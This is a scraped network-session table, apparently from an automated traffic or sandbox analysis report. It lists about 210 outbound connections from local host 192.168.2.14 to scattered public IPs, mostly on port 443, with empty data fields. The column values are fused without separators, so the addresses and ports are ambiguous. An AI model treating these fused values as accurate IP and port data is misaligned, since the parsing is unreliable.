                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21800192.168.2.1451460141.234.193.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21801192.168.2.145894082.140.39.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21802192.168.2.1450370173.121.222.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21803192.168.2.145120420.89.60.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21804192.168.2.146059239.252.251.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21805192.168.2.146010419.252.102.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21806192.168.2.145500419.164.75.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21807192.168.2.1440984144.143.200.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21808192.168.2.1452926172.229.38.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21809192.168.2.144937050.188.227.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21810192.168.2.144465087.147.188.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21811192.168.2.143990024.155.184.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21812192.168.2.1433292113.34.232.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21813192.168.2.1460454177.224.77.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21814192.168.2.1446326169.227.143.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21815192.168.2.1433324129.232.111.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21816192.168.2.1446708113.219.233.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21817192.168.2.1439870187.193.14.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21818192.168.2.145402275.59.180.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21819192.168.2.145151297.9.252.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21820192.168.2.143404474.160.12.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21821192.168.2.145648684.8.117.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21822192.168.2.1459626220.242.43.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21823192.168.2.1436070136.190.194.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21824192.168.2.144420847.35.19.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21825192.168.2.145570853.121.93.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21826192.168.2.145861212.50.206.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21827192.168.2.143547661.80.249.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21828192.168.2.1460346193.66.185.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21829192.168.2.1442768212.118.110.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21830192.168.2.1446856124.81.240.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21831192.168.2.1443046122.220.187.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21832192.168.2.143461625.145.97.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21833192.168.2.1437956190.225.254.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21834192.168.2.143634035.146.58.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21835192.168.2.1433512161.125.69.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21836192.168.2.1447044136.250.90.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21837192.168.2.143622292.175.216.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21838192.168.2.1441928149.110.33.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21839192.168.2.1435788118.40.61.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21840192.168.2.144231858.8.37.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21841192.168.2.1460498139.238.207.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21842192.168.2.1443978181.97.227.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21843192.168.2.1439646110.251.238.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21844192.168.2.144506458.142.218.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21845192.168.2.1447870195.37.204.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21846192.168.2.1451912221.127.148.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21847192.168.2.145311825.73.88.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21848192.168.2.143423258.60.9.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21849192.168.2.1433140162.108.81.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21850192.168.2.1456374194.175.238.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21851192.168.2.1433714110.35.149.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21852192.168.2.1437150208.226.143.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21853192.168.2.1445558104.27.53.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21854192.168.2.1455606142.12.241.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21855192.168.2.1450568195.75.77.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21856192.168.2.1451804135.99.162.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21857192.168.2.145741068.243.185.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21858192.168.2.1441198154.51.226.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21859192.168.2.1456462137.229.248.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21860192.168.2.1460782150.13.97.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21861192.168.2.143304892.204.2.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21862192.168.2.1460158119.78.105.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21863192.168.2.1447268149.212.189.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21864192.168.2.1450214164.246.86.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21865192.168.2.1455280102.123.116.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21866192.168.2.144574825.253.23.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21867192.168.2.1449404177.62.1.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21868192.168.2.1442052106.236.10.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21869192.168.2.145079294.230.212.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21870192.168.2.1433366111.70.233.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21871192.168.2.144149613.197.107.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21872192.168.2.145016034.56.231.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21873192.168.2.143658467.182.196.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21874192.168.2.1442600114.191.152.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21875192.168.2.145221020.58.218.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21876192.168.2.145598290.252.63.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21877192.168.2.1444366223.132.180.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21878192.168.2.1447092136.71.99.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21879192.168.2.1441306166.142.6.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21880192.168.2.145100863.82.149.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21881192.168.2.144483649.94.202.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21882192.168.2.145838820.253.253.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21883192.168.2.1453518175.189.159.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21884192.168.2.145056485.192.147.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21885192.168.2.145422452.233.10.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21886192.168.2.143434863.91.13.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21887192.168.2.144075872.104.52.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21888192.168.2.144893046.137.19.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21889192.168.2.1434790114.203.239.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21890192.168.2.143801480.207.36.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21891192.168.2.145086091.5.220.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21892192.168.2.1450006109.50.135.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21893192.168.2.14484468.48.193.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21894192.168.2.144476094.109.113.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21895192.168.2.1452340111.102.97.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21896192.168.2.143985458.157.174.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21897192.168.2.1453838211.71.196.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21898192.168.2.1446016168.145.56.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21899192.168.2.1446548194.188.127.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21900192.168.2.144763888.35.134.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21901192.168.2.1434094145.97.94.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21902192.168.2.145524696.51.2.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21903192.168.2.1451324176.179.18.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21904192.168.2.1447714115.173.168.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21905192.168.2.14394465.251.87.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21906192.168.2.1440784108.66.148.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21907192.168.2.1460264203.252.251.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21908192.168.2.144714638.253.245.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21909192.168.2.1455208158.206.76.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21910192.168.2.1441826175.8.178.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21911192.168.2.144688883.221.166.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21912192.168.2.1453454108.11.245.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21913192.168.2.144113413.101.2.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21914192.168.2.1460372219.229.78.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21915192.168.2.1453734194.64.137.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21916192.168.2.1439634174.213.125.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21917192.168.2.1454476130.189.148.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21918192.168.2.1454908221.135.144.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21919192.168.2.145967240.193.101.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21920192.168.2.145206061.223.201.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21921192.168.2.1436720186.121.194.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21922192.168.2.145871266.18.135.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21923192.168.2.1442592104.0.19.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21924192.168.2.1460546180.43.63.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21925192.168.2.1437238211.236.1.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21926192.168.2.1445942134.21.66.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21927192.168.2.144414481.72.205.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21928192.168.2.1432802198.35.144.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21929192.168.2.1450278147.138.188.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21930192.168.2.1444248169.209.0.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21931192.168.2.1434928169.204.107.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21932192.168.2.1433796198.214.97.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21933192.168.2.145303667.80.19.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21934192.168.2.144670044.135.28.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21935192.168.2.1450834177.172.202.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21936192.168.2.1436754109.198.104.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21937192.168.2.1453778140.124.219.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21938192.168.2.145144484.174.231.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21939192.168.2.144705212.78.185.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21940192.168.2.144098887.207.237.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21941192.168.2.145549053.77.53.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21942192.168.2.143472896.172.176.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21943192.168.2.1449708121.227.124.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21944192.168.2.1456570132.242.225.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21945192.168.2.145822891.29.248.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21946192.168.2.145654090.242.180.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21947192.168.2.1440004173.184.17.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21948192.168.2.144831687.156.220.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21949192.168.2.1439490203.63.64.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21950192.168.2.1441748129.245.146.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21951192.168.2.1452768124.97.237.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21952192.168.2.1434744114.234.67.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21953192.168.2.145192214.241.63.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21954192.168.2.1436414116.23.178.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21955192.168.2.1441498166.111.177.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21956192.168.2.143699242.4.101.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21957192.168.2.1433088110.139.168.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21958192.168.2.144098473.37.59.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21959192.168.2.1445880220.200.81.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21960192.168.2.1454606160.28.60.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21961192.168.2.1451056158.169.213.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21962192.168.2.145563625.254.83.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21963192.168.2.145256047.23.253.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21964192.168.2.143556253.84.142.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21965192.168.2.144272084.5.45.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21966192.168.2.1447260121.6.245.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21967192.168.2.1444278208.241.83.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21968192.168.2.1438510108.82.183.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21969192.168.2.144971625.227.127.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21970192.168.2.1442836219.246.254.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21971192.168.2.144858641.229.115.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21972192.168.2.1445550170.116.179.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21973192.168.2.1446848220.112.217.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21974192.168.2.1456296195.60.199.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21975192.168.2.1449640220.92.42.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21976192.168.2.144460214.32.56.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21977192.168.2.1446340131.0.243.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21978192.168.2.1445692211.104.109.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21979192.168.2.1459000116.176.176.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21980192.168.2.1456934116.79.166.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21981192.168.2.1456000111.61.190.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21982192.168.2.1449764125.234.192.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21983192.168.2.1450336221.0.123.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21984192.168.2.1437614162.222.86.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21985192.168.2.1458500205.13.218.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21986192.168.2.1443238217.208.169.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21987192.168.2.143702887.135.8.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21988192.168.2.1456722185.172.197.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21989192.168.2.1434652129.33.99.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21990192.168.2.1455304111.25.143.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21991192.168.2.145419674.150.128.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21992192.168.2.1456814160.142.33.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21993192.168.2.1437070219.74.155.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21994192.168.2.1453146161.6.29.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21995192.168.2.144587882.36.114.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21996192.168.2.145741679.248.58.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21997192.168.2.1448396155.42.235.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21998192.168.2.1441848187.52.19.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21999192.168.2.1437960170.50.46.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22000192.168.2.143425619.135.140.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22001192.168.2.1437108170.55.237.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22002192.168.2.146014262.113.168.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22003192.168.2.1448858189.103.205.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22004192.168.2.1437448155.23.143.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22005192.168.2.145551659.146.109.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22006192.168.2.1450112223.91.125.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22007192.168.2.1454926113.9.39.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22008192.168.2.145459898.104.23.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22009192.168.2.143369049.92.109.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22010192.168.2.1442718204.179.26.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22011192.168.2.146022441.211.223.220443
                                                        TimestampBytes transferredDirectionData


